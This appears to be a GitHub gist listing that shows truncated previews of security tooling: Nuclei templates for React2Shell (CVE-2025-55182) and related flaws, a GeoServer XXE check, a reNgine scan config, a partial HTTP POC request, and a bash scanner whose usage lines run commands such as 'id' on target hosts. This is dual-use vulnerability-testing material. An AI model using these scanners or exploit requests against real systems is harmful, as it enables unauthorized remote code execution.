Emad Shanab emadshanab

@Pymmdrza
Pymmdrza / Backup_finder_nuclei_v2.yml
Last active January 24, 2026 19:01
Nuclei Backup Finder Template
id: file-type-search-all
info:
  name: File Type Search
  author: ProjectDiscoveryAI
  severity: low
  description: |
    Searches for files with specific extensions (.tar, .gz, .tar.gz, .zip, .sql, .bak, .rar) on the target, regardless of the file name.
  tags: file,fuzzing
@themadarchitect
themadarchitect / react2shell.yaml
Created December 14, 2025 19:32
nuclei react2shell template
id: cve-2025-55182-cve-2025-66478-react-nextjs-rce
info:
  name: React Server Components and Next.js RSC Flight Protocol - Remote Code Execution
  author: unknown
  severity: critical
  description: |
    Detects CVE-2025-55182 and CVE-2025-66478 vulnerabilities allowing unauthenticated
    Remote Code Execution (RCE) in React Server Components and Next.js through insecure
    deserialization in the RSC Flight protocol.
@bolhasec
bolhasec / CVE-2025-55183.yaml
Created December 12, 2025 21:55
POC for CVE-2025-55183
id: CVE-2025-55183
# In my tests, using -debug flag provides better results
info:
  name: Next.js Server Action Introspection
  author: sushicomabacate
  severity: high
  description: |
    Extracts 40 or 42-character Server Action IDs from /_next/static/chunks/app/page.js and invokes them via POST to check for source code leakage.
@simokohonen
simokohonen / gist:c7b21f3d47e2e45613fec36f535547a1
Created December 12, 2025 07:08
cisco_log4j_looking_things
id: CVE-2025-55182
info:
  name: React Server Components - Remote Code Execution (React2Shell)
  author: assetnote,slcyber
  severity: critical
  description: |
    React Server Components (RSC) in React versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 contain an insecure deserialization
    vulnerability in the Flight protocol. An unauthenticated remote attacker can exploit this by sending a specially crafted
    multipart payload to execute arbitrary JavaScript code on the server. This affects Next.js applications using the App
@Ademking
Ademking / scanner.sh
Created December 8, 2025 14:44
CVE-2025-55182 Scanner - React2Shell
#!/bin/bash
# CVE-2025-55182 Advanced Scanner
# A comprehensive tool for detecting and exploiting CVE-2025-55182 in Next.js applications
# Based on the Nuclei template from: https://cloud.projectdiscovery.io/library/CVE-2025-55182
#
# Usage:
# ./scanner.sh -d <domain> -c <command>
# ./scanner.sh -d vulnapp.com -c id
# ./scanner.sh -d http://localhost:3000 -c "ping -c 3 google.com"
@bolhasec
bolhasec / CVE-2025-55182.yaml
Created December 4, 2025 21:36
Nuclei template for CVE-2025-55182
# Run with
# nuclei -u http://localhost:3000/ -id react-rsc-rce-oast -iserver <your own interactsh URL>
# For example: nuclei -u http://localhost:3000/ -id react-rsc-rce-oast -iserver mrh2hxtll3x5n6blhhjq304t0k6b21iy.oastify.com
id: react-rsc-rce-oast
info:
  name: React RSC / Next.js RCE via Prototype Pollution (OAST)
  author: sushicomabacate
  severity: critical
  description: |
@maple3142
maple3142 / CVE-2025-55182.http
Last active January 25, 2026 06:20
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
@MQ-xz
MQ-xz / reNgine full scan engine.yml
Last active January 24, 2026 19:07
reNgine Full scan engine (subdomains + passive & active)
reNgine full scan engine (subdomains + passive & active)
# YOYO model: passive discovery -> active enumeration/validation -> passive re-check/cleanup
# This engine performs subdomain enumeration, URL fetching, passive scans first,
# then active follow-ups (port scan, aggressive dir fuzzing, active vuln templates),
# then a final passive validation pass to reduce false positives and re-collect endpoints.
# Drop this file in web/config/default_scan_engines/ and load with the update scripts/management commands.
custom_header: {
  'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0',
}
@bolhasec
bolhasec / poc-CVE-2025-58360.yaml
Created November 26, 2025 11:23
POC for CVE-2025-58360
id: geoserver-wms-sld-xxe
info:
  name: GeoServer WMS SLD XXE Detection
  author: bolhasec
  severity: medium
  description: |
    Attempts to exploit an XXE vulnerability via a StyledLayerDescriptor (SLD)
    in a WMS GetMap POST request. A secure GeoServer instance should reject
    entity resolution and return an error like "Entity resolution disallowed for file".